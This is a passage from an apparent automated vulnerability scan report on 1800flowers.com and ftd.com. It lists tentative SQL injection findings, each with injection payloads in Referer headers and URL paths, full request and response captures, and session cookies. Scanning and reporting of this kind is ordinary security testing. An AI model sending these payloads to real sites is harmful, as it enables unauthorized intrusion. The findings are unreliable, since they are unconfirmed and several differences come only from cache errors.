<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/redesign/jquery-ui-1.7.2.custom_chk1.css"/>


<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.
...[SNIP]...

1.6. https://ww30.1800flowers.com/checkoutsignin.do [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:30 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Ln0FjPqsWC1vFgUWBlg4otv:-1; Path=/
Set-Cookie: 18FBannerCode=seogoogle; Expires=Wed, 11-May-11 01:16:30 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Sign In - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://www.1800flowers.com/checkoutsignin.do" />

<link rel="shortcut icon" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/n-checkout_oct.css"/>

<style type="text/css">/* common.css */.trsHeader {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repea
...[SNIP]...

Request 2

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:30 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: 18FBannerCode=seogoogle; Expires=Wed, 11-May-11 01:16:30 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Sign In - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://www.1800flowers.com/checkoutsignin.do" />

<link rel="shortcut icon" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/n-checkout_oct.css"/>

<style type="text/css">/* common.css */.trsHeader {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top
...[SNIP]...

1.7. http://www.ftd.com/350/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21285651'%20or%201%3d1--%20 and 21285651'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35021285651'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:03:44 GMT
X-Varnish: 540322091
Age: 12
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540322091</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35021285651'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=2FD5010279D810790011F758B4F4C273; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=2FD5010279D810790011F758B4F4C273; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:03:44 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:03:45 GMT
X-Varnish: 750145506
Age: 1
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.8. http://www.ftd.com/350/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15879274'%20or%201%3d1--%20 and 15879274'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/favicon.ico15879274'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:05:27 GMT
X-Varnish: 869422801
Age: 12
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869422801</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/favicon.ico15879274'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=6D8C53EC79D810790014BFC3CFF4C69A; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=6D8C53EC79D810790014BFC3CFF4C69A; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:05:27 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:05:28 GMT
X-Varnish: 1301387315
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       
...[SNIP]...

1.9. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 83538669'%20or%201%3d1--%20 and 83538669'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35083538669'%20or%201%3d1--%20/v20110407/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:04:56 GMT
X-Varnish: 869420999
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869420999</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35083538669'%20or%201%3d2--%20/v20110407/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=5AFF297079D8107900098B649F286376; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=5AFF297079D8107900098B649F286376; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:04:56 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:04:57 GMT
X-Varnish: 729980488
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.10. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17090585'%20or%201%3d1--%20 and 17090585'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/v2011040717090585'%20or%201%3d1--%20/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:47 GMT
X-Varnish: 750156685
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750156685</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/v2011040717090585'%20or%201%3d2--%20/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=9D1A98E479D8107900078E669A912BE0; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9D1A98E479D8107900078E669A912BE0; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:06:47 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:06:48 GMT
X-Varnish: 729987039
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.11. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14836871'%20or%201%3d1--%20 and 14836871'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/v20110407/ftd.css14836871'%20or%201%3d1--%20?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:57 GMT
X-Varnish: 540338955
Age: 22
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540338955</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/v20110407/ftd.css14836871'%20or%201%3d2--%20?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=EA3EF0E879D810790009D4C6C7EFA5CB; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=EA3EF0E879D810790009D4C6C7EFA5CB; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:08:57 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:08:57 GMT
X-Varnish: 540340109
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
